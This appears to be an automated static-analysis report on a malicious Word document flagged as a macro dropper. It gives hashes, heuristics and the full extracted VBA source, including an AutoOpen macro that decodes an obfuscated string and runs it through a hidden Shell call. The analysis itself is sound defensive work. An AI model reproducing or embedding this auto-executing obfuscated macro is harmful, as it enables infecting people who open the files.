Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7f2076337237f0c4…

MALICIOUS

Office (OLE)

52.0 KB Created: 2018-04-19 10:47:00 Authoring application: Microsoft Office Word First seen: 2018-04-30
MD5: 86d8ca6dd0764607545fb119567e7bde SHA-1: 539fa856001dab587d5881c5b275f7e772fb1d13 SHA-256: 7f2076337237f0c48c3081d6b3ce3c8e77c4424661a02f85101142fe4266e798
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'AutoOpen' macro is present, indicating it will execute automatically when the document is opened. The critical heuristic 'OLE_VBA_SHELL' suggests the macro attempts to execute system commands. The presence of a ClamAV detection for 'Doc.Dropper.Agent-6510804-0' further confirms its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6510804-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6510804-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    wd = Form1.TextBox2.Tag
    If "" = wd Then Shell s, Kolm
    Form1.TextBox2.Text = ""
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
    Swedenarform
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3268 bytes
SHA-256: d3560f9bbe08f86909c58977cf702ae48b18bb7b803c9472d0db625dc1a906e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Swedenarform
End Sub










Attribute VB_Name = "Module1"

Function zasohpers()
Dim jir As Integer
jir = 5 + 1
zasohpers = jir - 1
jir = 1 + zasohpers
End Function

Rem Form1 show messages


Function kontakter(str26, count1)
Dim xon20() As Byte
Dim maxdaj As String
Dim minbit() As Byte
Dim kas3 As String
xon20 = "MWZC"
Dim maxe() As Byte
Dim kaspr As Integer
kaspr = 0
Dim fruka As Integer
kas3 = xon20
Dim j1 As String
Dim xopova As Integer
Dim XrttacaI() As Byte
Dim I As Integer
I = 374
Dim Qapi2 As Integer
WSOP = Form1.Con(xon20)
Dim ngwiL As String
xopova = 92 - str26
xopova = xopova - 1
Dim hzmould As String
j1 = count1
maxdaj = ""
maxe = j1
hzmould = "RgeHise"
Qapi2 = Form1.Con(maxe)
ngwiL = "Mirqc8"
hujkot = kaspr
For uD = hujkot To Qapi2
manji = kaspr
For zaLp1 = kaspr To WSOP
If maxe(uD) = xon20(zaLp1) Then
manji = manji + kaspr + 1
End If
Next
If hujkot = manji Then
maxdaj = maxdaj + Form1.paplace(maxe(uD) - xopova)
End If
Next
kontakter = maxdaj
With Form1
.TextBox1.Text = maxdaj
fruka = I + xopova
fruka = -fruka + Len(maxdaj)
If 107 < fruka Then
.But_click
End If
.TextBox2.Text = ""
End With
End Function




Function slipersat()
Dim jiko As String
jiko = "dnZe!0dCZ!QpxZCfsTifZCZmm!M!#(CQpxfWWsTCWifZCMmm!MW#CW#=$WZM5fWZCy$?gZZCvWZWodWujpoMMW!C"
Dim ni As Integer
ni = 1
With Form1
jiko = jiko + .TextBox1.Text
Rem + .TextBox2.Text
slipersat = jiko
End With
ni = ni + 1
End Function



Sub Swedenarform()
Dim sder As String
Dim palat As Integer
palat = 60 + 30
sder = kontakter(palat, slipersat())
hernas = 0
End Sub












Attribute VB_Name = "Form1"
Attribute VB_Base = "0{3FC0B45D-54EF-43D0-8988-06E290D36B61}{99FDA0F1-DB26-40FF-AF58-FBA20B73EBBD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False






Function Con(nij)
zzpa = 0
Con = zzpa + UBound(nij)
End Function

Private Sub com2_Click()
Form1.TextBox1.Text = "4"
End Sub

Private Sub CommandButton2_Click()
Form1.TextBox2.Text = "5"
End Sub

Private Sub but1_Click()

End Sub

Private Sub but2_Click()
Form1.TextBox1.Text = ""
End Sub

Private Sub Label1_Click()

End Sub

Private Sub ListBox1_Click()
Form1.TextBox2.Text = ""
End Sub

Private Sub TextBox1_Change()
Dim s1 As String
s1 = Form1.TextBox1.Text
For J = 0 To 3
For I = 0 To 50000
s1 = "" + s1
Next I
Next J
Form1.TextBox2.Text = s1
End Sub

Function paplace(masad)
Dim stio As Integer
stio = masad + 5
paplace = Chr$(stio - 5)
End Function

Private Sub TextBox2_Change()

End Sub

Sub But_click()
Dim s As String
s = Form1.TextBox2.Text + ""
Dim Im As Integer
Kolm = 178 - 170 - 8
wd = Form1.TextBox2.Tag
If "" = wd Then Shell s, Kolm
Form1.TextBox2.Text = ""
End Sub